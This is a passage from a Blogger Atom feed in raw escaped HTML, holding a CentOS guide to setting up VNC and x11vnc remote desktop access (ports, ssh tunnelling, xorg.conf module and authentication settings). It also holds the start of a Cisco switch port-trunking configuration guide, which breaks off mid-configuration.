margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;1024x768&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;8&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;5903/tcp&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;span class="anchor" id="line-189"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;800x600&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;8&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;5904/tcp&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;span class="anchor" id="line-190"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;640x480&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;8&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;5905/tcp&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;span class="anchor" id="line-191"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-192"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-193"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;A major advantage of using the vnc-ltsp-config setup is the reduction of system resource utilization compared to the standard "per-user setup". No user processes will be started or memory consumed until a user actually logs into the system. Also, no pre-thought for user setup is needed (eg skip all of the manual individual user setup for vnc-server). The downside to the vnc-ltsp-config setup is that *any* user with the ability to login will likely have the ability to log into the system via a vnc-client with full gui unless steps are taken to limit that type of access. Also, there is no session persistance! Once the vnc-client closes, the vnc-ltsp-config session will terminate (by default) and all running processes will be killed.&lt;span class="anchor" id="line-194"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-195"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;This option can be combined with ssh tunnelling using a slightly modified version of the "vncviewer -via" command noted above:&lt;span class="anchor" id="line-196"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-197"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;vncviewer -via remoteUser@remoteHost localhost:vncSinglePortNumber &lt;span class="anchor" id="line-198"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-199"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;For the default vnc-ltsp-config install, the "vncSinglePortNumber" is the last digit only of the port number. Port 5900 (1024x768 16bit) would just be "0", for example.&lt;span class="anchor" id="line-200"&gt;&lt;/span&gt;&lt;/p&gt;&lt;h2 id="head-a62534b6c5b0fecafb137b0606a429864432fee9" style="font-size: 1.4em; line-height: 1.8em; margin-top: 1.6em; margin-right: 0px; margin-bottom: 0.8em; margin-left: 0px; padding-left: 0.7em; background-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-h2-background.png); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; color: rgb(7, 43, 97); "&gt;6. VNC-Server for an already logged in GUI console session - 2 options&lt;/h2&gt;&lt;span class="anchor" id="line-201"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-202"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Often you will need remote access to an already logged in GUI session on a "real" console. Or you will need to help another user remotely with an GUI or visual issue. You will need either "vnc-server" or "x11vnc". The vnc-server option will be a module added to X11 for "allways on" vnc support, while x11vnc will allow for adhoc vnc support.&lt;span class="anchor" id="line-203"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-204"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;vnc-server install will require no third party repos or source building.&lt;span class="anchor" id="line-205"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-206"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;x11vnc is a way to &lt;em&gt;view remotely and interact with real X displays (i.e. a display corresponding to a physical monitor, keyboard, and mouse) with any VNC viewer. In this way it plays the role for Unix/X11 that WinVNC plays for Windows.&lt;/em&gt;&lt;span class="anchor" id="line-207"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-208"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-25026bd1bf8162e043a4868f82a0d95170614c73" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;6.1. x11vnc adhoc option&lt;/h3&gt;&lt;span class="anchor" id="line-209"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Karl Runge has generously provide a exceptional amount of information at &lt;a class="http" href="http://www.karlrunge.com/x11vnc/" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;http://www.karlrunge.com/x11vnc/&lt;/a&gt; for x11vnc. There is info on securing the connection and also an "Enhanced TightVNC Viewer (ssvnc)". To make it easy, follow these steps:&lt;span class="anchor" id="line-210"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-211"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;1. Download the latest rpm install from &lt;a class="http" href="http://dag.wieers.com/rpm/packages/x11vnc/" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;http://dag.wieers.com/rpm/packages/x11vnc/&lt;/a&gt; to the host you want the vnc-client to connect to:&lt;span class="anchor" id="line-212"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-213"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;wget http://dag.wieers.com/rpm/packages/x11vnc/x11vnc-0.9.3-1.el5.rf.i386.rpm &lt;span class="anchor" id="line-214"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-215"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;2. Install, as root, via the yum or rpm programs on the host you want the vnc-client to connect to:&lt;span class="anchor" id="line-216"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-217"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;yum install x11vnc-0.9.3-1.el5.rf.i386.rpm &lt;span class="anchor" id="line-218"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-219"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;3. Start the x11vnc process on the host you want the vnc-client to connect to. Please take a long look at the possible options from the x11vnc website. A very simple/insecure example for a trusted network setup (local network or VPN) is to have the user with the GUI console issue the command:&lt;span class="anchor" id="line-220"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-221"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;[user@helpme_host ~$] x11vnc -nopw -display :0.0 &lt;span class="anchor" id="line-222"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-223"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Then connect (without password) via a vnc-client to the IP/hostname and port noted by the x11vnc command. By default, x11vnc will allow connections from all interfaces. Host based firewall settings may need to be modified.&lt;span class="anchor" id="line-224"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-225"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;You can combine this with ssh tunneling:&lt;span class="anchor" id="line-226"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-227"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;ssh -C -t -L 5900:localhost:5900 [remote ip] 'x11vnc -usepw -localhost -display :0' &lt;span class="anchor" id="line-228"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-229"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Note that the &lt;tt class="backtick" style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;-C&lt;/tt&gt; flag is for compression, so may not be required&lt;span class="anchor" id="line-230"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-231"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-7e0dadd72b0ddd9c84381b053b440d251d4a9c8b" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;6.2. vnc-server X11 "always on" option&lt;/h3&gt;&lt;span class="anchor" id="line-232"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;1. On the the system you want to run vnc-server, install vnc-server as noted above.&lt;span class="anchor" id="line-233"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-234"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;2. Edit /etc/X11/xorg.conf, as root, and add/create a 'Module' Section and add 'Load "vnc"':&lt;span class="anchor" id="line-235"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;Section "Module"  &lt;span class="anchor" id="line-236"&gt;&lt;/span&gt;  Load "vnc" &lt;span class="anchor" id="line-237"&gt;&lt;/span&gt;EndSection &lt;span class="anchor" id="line-238"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-239"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;3. For standard vnc authentication, edit /etc/X11/xorg.conf, as root, and add to the 'Screen' Section:&lt;span class="anchor" id="line-240"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt; Option "SecurityTypes" "VncAuth"  &lt;span class="anchor" id="line-241"&gt;&lt;/span&gt;  Option "UserPasswdVerifier" "VncAuth" &lt;span class="anchor" id="line-242"&gt;&lt;/span&gt;  Option "PasswordFile" "/root/.vnc/passwd" &lt;span class="anchor" id="line-243"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-244"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;4. As root, run 'vncpasswd" to create the password noted above.&lt;span class="anchor" id="line-245"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-246"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;5. Restart X11 (&lt;ctrl&gt;+&lt;alt&gt;+&lt;bs&gt; will work if on the console already)&lt;span class="anchor" id="line-247"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-248"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;6. You should be able to connect with a vncviewer client as normal.&lt;span class="anchor" id="line-249"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-250"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;7. To trouble shoot, check for errors in the /var/log/Xorg.0.log or verify that iptables or selinux is not interfering with remote connections. Additional information is at &lt;a class="http" href="http://www.realvnc.com/products/free/4.1/x0.html" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;http://www.realvnc.com/products/free/4.1/x0.html&lt;/a&gt;&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-2002617246093625208?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/2002617246093625208/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/vnc-virtual-network-computing-on-centos.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/2002617246093625208'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/2002617246093625208'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/vnc-virtual-network-computing-on-centos.html' title='VNC ( Virtual Network Computing ) on CentOS'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7319488858595727984</id><published>2010-02-05T13:03:00.000-08:00</published><updated>2010-02-05T13:40:38.068-08:00</updated><title type='text'>How to trunk ports on a Cisco Switch</title><content type='html'>&lt;span class="Apple-style-span"   style="  ;font-family:Arial, Helvetica, sans-serif;font-size:13px;"&gt;&lt;h2 style="font-size: 14px; color: rgb(51, 102, 102); text-decoration: none; font-weight: bold; "&gt;&lt;a name="conf"&gt;Configure&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In this section, you are presented with the information to configure the features described in this document.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Note: &lt;/b&gt;To find additional information on the commands used in this document, use the &lt;a href="http://www.cisco.com/pcgi-bin/Support/Cmdlookup/home.pl" onclick="s_objectID=&amp;quot;http://www.cisco.com/pcgi-bin/Support/Cmdlookup/home.pl_1&amp;quot;;return this.s_oc?this.s_oc(e):true" style="color: rgb(0, 51, 153); "&gt;Command Lookup Tool&lt;/a&gt; (&lt;span style="font-size:-1;"&gt; &lt;a href="http://tools.cisco.com/RPF/register/register.do" onclick="s_objectID=&amp;quot;http://tools.cisco.com/RPF/register/register.do_4&amp;quot;;return this.s_oc?this.s_oc(e):true" style="color: rgb(0, 51, 153); "&gt;registered&lt;/a&gt; customers only&lt;/span&gt;) .&lt;/p&gt;&lt;h3 style="font-size: 14px; color: rgb(51, 102, 102); text-decoration: none; font-weight: bold; "&gt;&lt;a name="diag"&gt;Network Diagram&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;This document uses the network setup shown in the diagram below.&lt;/p&gt;&lt;p&gt;&lt;img alt="50a.jpg" border="0" src="http://www.cisco.com/image/gif/paws/14976/50a.jpg" usemap="http://www.cisco.com/en/US/tech/tk389/tk815/technologies_configuration_example09186a00800949fd.shtml" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; " /&gt;&lt;/p&gt;&lt;h3 style="font-size: 14px; color: rgb(51, 102, 102); text-decoration: none; font-weight: bold; "&gt;&lt;a name="configs"&gt;Configurations&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;This document uses the configurations shown below.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Note: &lt;/b&gt;Router models with certain network modules may have different minimum Cisco IOS versions that support ISL trunking.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Catalyst 3512-XL&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Cisco 2600 Router&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;802.1Q Configuration on the Router for Cisco IOS Versions Earlier than 12.1(3)T&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: 13px; -webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; "&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="font-size: 13px; "&gt;switch#&lt;b&gt;configure terminal&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Enter configuration commands, one per line. End with CNTL/Z.&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;switch(config)#&lt;b&gt;hostname 3512xl&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#&lt;b&gt;enable password mysecret&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config)#&lt;b&gt;line vty 0 4&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; 